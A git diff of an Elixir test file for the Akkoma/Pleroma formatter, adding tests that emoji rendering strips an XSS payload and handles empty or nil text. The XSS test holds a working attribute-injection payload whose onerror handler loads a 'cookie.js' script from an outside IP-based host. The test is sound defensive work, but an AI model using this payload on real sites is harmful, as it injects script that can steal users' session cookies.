X-Git-Url: http://git.squeep.com/?a=blobdiff_plain;f=test%2Fformatter_test.exs;h=273eefb8a773aef4246e86f95b41717fa5d68163;hb=4a3dbd9d4e052969460bad19dfc535908027ed03;hp=95558089bd784f2720b978eafa41040d2dd1e243;hpb=be7a6db1f54a033afb7cb564f9cf0c9bdafe5055;p=akkoma

diff --git a/test/formatter_test.exs b/test/formatter_test.exs
index 95558089b..273eefb8a 100644
--- a/test/formatter_test.exs
+++ b/test/formatter_test.exs
@@ -189,14 +189,39 @@ defmodule Pleroma.FormatterTest do
     text = "I love :moominmamma:"
 
     expected_result =
-      "I love <img height='32px' width='32px' alt='moominmamma' title='moominmamma' src='/finmoji/128px/moominmamma-128.png' />"
+      "I love <img height=\"32px\" width=\"32px\" alt=\"moominmamma\" title=\"moominmamma\" src=\"/finmoji/128px/moominmamma-128.png\" />"
 
     assert Formatter.emojify(text) == expected_result
   end
 
+  test "it does not add XSS emoji" do
+    text =
+      "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):"
+
+    custom_emoji = %{
+      "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" =>
+        "https://placehold.it/1x1"
+    }
+
+    expected_result =
+      "I love <img height=\"32px\" width=\"32px\" alt=\"\" title=\"\" src=\"https://placehold.it/1x1\" />"
+
+    assert Formatter.emojify(text, custom_emoji) == expected_result
+  end
+
   test "it returns the emoji used in the text" do
     text = "I love :moominmamma:"
 
     assert Formatter.get_emoji(text) == [{"moominmamma", "/finmoji/128px/moominmamma-128.png"}]
   end
+
+  test "it returns a nice empty result when no emojis are present" do
+    text = "I love moominamma"
+    assert Formatter.get_emoji(text) == []
+  end
+
+  test "it doesn't die when text is absent" do
+    text = nil
+    assert Formatter.get_emoji(text) == []
+  end
 end